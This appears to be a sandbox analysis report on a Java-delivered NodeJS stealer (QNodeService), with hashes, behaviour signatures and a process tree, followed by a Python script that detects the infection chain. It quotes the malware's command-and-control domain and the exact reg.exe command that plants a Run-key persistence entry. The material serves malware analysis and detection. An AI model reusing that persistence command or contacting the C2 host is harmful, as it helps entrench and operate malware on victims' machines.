Analysis
- max time kernel: 80s
- max time network: 143s
- platform: windows10_x64
- resource: win10
- submitted: 26/10/2020, 16:50
Static task: static1
Behavioral task: behavioral1
- Sample: fsdfas.jar
- Resource: win7
Behavioral task: behavioral2
- Sample: fsdfas.jar
- Resource: win10
General
- Target: fsdfas.jar
- Size: 68KB
- MD5: eeb9a3c4cc1fd0e95ff4184a50eb49d9
- SHA1: 8445135ef24533a22270fd15d9a9e767c43168e6
- SHA256: 6b9c4f7252046dbdc98d8eb537bdc776b1e35040b86c1dc1927c2e6bdd7e6c0d
- SHA512: 8533d4d2ef1fbcf7df5c452f613606df19a6271a54c4114809c3dfb21a0900e9d58474ba39da63b4bbd7aec4ed15279b81a3fcf538560e8e6bcc92781866ebcd
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.
- Executes dropped EXE (3 IoCs)
  pid   Process
  2040  node.exe
  3192  node.exe
  3900  node.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created (reg.exe):
    \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Set value (str) (reg.exe):
    \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\dcab72b4-51f8-49ea-8e07-27aff8c86805 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""
- JavaScript code in executable (3 IoCs)
  resource                                       yara_rule
  behavioral2/files/0x000100000001ab61-170.dat   js
  behavioral2/files/0x000100000001ab61-173.dat   js
  behavioral2/files/0x000100000001ab61-177.dat   js
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  30    wtfismyip.com
  29    wtfismyip.com
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  All six accesses are by node.exe:
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process   events
  2040  node.exe  4
  3192  node.exe  4
  3900  node.exe  10
- Suspicious use of WriteProcessMemory (12 IoCs; each pair is reported twice)
  pid   Process    wrote to memory of  procid_target
  3944  java.exe   2672                75
  2672  javaw.exe  2040                79
  2040  node.exe   3192                81
  3192  node.exe   3900                82
  3900  node.exe   392                 84
  392   cmd.exe    1712                85
Processes
1. C:\ProgramData\Oracle\Java\javapath\java.exe
   java -jar C:\Users\Admin\AppData\Local\Temp\fsdfas.jar
   PID: 3944
   - Suspicious use of WriteProcessMemory
  2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
     "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\57f14e08.tmp
     PID: 2672
     - Suspicious use of WriteProcessMemory
    3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
       C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org
       PID: 2040
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory
      4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kSFWED\boot.js --hub-domain success87.hopto.org
         PID: 3192
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
        5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kSFWED\boot.js --hub-domain success87.hopto.org
           PID: 3900
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
          6. C:\Windows\system32\cmd.exe
             C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dcab72b4-51f8-49ea-8e07-27aff8c86805" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             PID: 392
             - Suspicious use of WriteProcessMemory
            7. C:\Windows\system32\reg.exe
               REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dcab72b4-51f8-49ea-8e07-27aff8c86805" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               PID: 1712
               - Adds Run key to start application
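The process tree above is the useful detection surface: a Java launcher runs a renamed jar from Temp, a user-profile node.exe is started beneath it with a --hub-domain switch, and the chain ends in reg.exe writing a Run value that points at a .vbs. The following is an added example, not part of this report or of the sandbox's own signature logic. It turns those three observations into rules over process-creation events and walks parent links to recover the lineage. The events are constructed to mirror the tree in this report (PIDs, images and command lines copied from it); the explorer.exe/node.exe pair at the end is a constructed benign launch used to check that the rules do not over-match.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon EID 1 / EDR style): pid, parent pid, image, command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events mirroring the process tree in this report. Parent links follow the tree;
# PIDs 4000/4100 are a constructed benign Node.js launch from Explorer (not from the report).
EVENTS = [
    ProcEvent(3944, 0, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
              r"java -jar C:\Users\Admin\AppData\Local\Temp\fsdfas.jar"),
    ProcEvent(2672, 3944, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
              r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\57f14e08.tmp'),
    ProcEvent(2040, 2672, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org"),
    ProcEvent(3192, 2040, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kSFWED\boot.js --hub-domain success87.hopto.org"),
    ProcEvent(3900, 3192, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kSFWED\boot.js --hub-domain success87.hopto.org"),
    ProcEvent(392, 3900, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dcab72b4-51f8-49ea-8e07-27aff8c86805" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""'),
    ProcEvent(1712, 392, r"C:\Windows\system32\reg.exe",
              r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dcab72b4-51f8-49ea-8e07-27aff8c86805" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""'),
    ProcEvent(4000, 0, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(4100, 4000, r"C:\Program Files\nodejs\node.exe", r'"C:\Program Files\nodejs\node.exe" server.js'),
]

USER_PROFILE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)  # image lives under C:\Users\<name>\
JAVA = {"java.exe", "javaw.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Walk parent links from pid towards the root; returns nearest parent first. Cycle-safe."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], {pid}
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def lineage(events, pid):
    """Root-to-leaf image names for pid, e.g. ['java.exe', 'javaw.exe', ..., 'reg.exe']."""
    by_pid = {e.pid: e for e in events}
    return [basename(e.image) for e in reversed(ancestors(events, pid))] + [basename(by_pid[pid].image)]


def detect(events):
    """Apply the three rules derived from this report; returns (pid, rule) pairs."""
    hits = []
    for e in events:
        name = basename(e.image)
        # Rule 1: javaw.exe executing a .tmp file as a jar (the dropped second stage).
        if name == "javaw.exe" and re.search(r"-jar\s+\S+\.tmp\b", e.cmdline, re.I):
            hits.append((e.pid, "javaw.exe runs a .tmp file as a jar"))
        if name == "node.exe":
            # Rule 2a: a Node runtime dropped under a user profile, with Java somewhere above it.
            if USER_PROFILE.match(e.image) and any(basename(a.image) in JAVA for a in ancestors(events, e.pid)):
                hits.append((e.pid, "node.exe under a user profile launched beneath Java"))
            # Rule 2b: the --hub-domain switch seen on every node.exe command line in this report.
            if "--hub-domain" in e.cmdline:
                hits.append((e.pid, "node.exe started with --hub-domain"))
        # Rule 3: reg.exe adding a Run value whose data launches a .vbs.
        if (name == "reg.exe" and re.search(r"\badd\b", e.cmdline, re.I)
                and re.search(r"currentversion\\run\b", e.cmdline, re.I)
                and re.search(r"\.vbs\b", e.cmdline, re.I)):
            hits.append((e.pid, "reg.exe adds a Run value that launches a .vbs"))
    return hits


def flagged_pids(events):
    return sorted({pid for pid, _ in detect(events)})


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"{pid:>5}  {' -> '.join(lineage(EVENTS, pid))}\n       {rule}")
```

Rule 2a is the one worth keeping generic: a developer's node.exe under C:\Program Files\nodejs started from Explorer does not fire, while any node.exe dropped into a user profile beneath a Java process does, whatever the hub domain or Run value name is in a later sample. The other two rules are tied to strings seen in this particular report and should be treated as indicators for this family's current loader, not as durable logic.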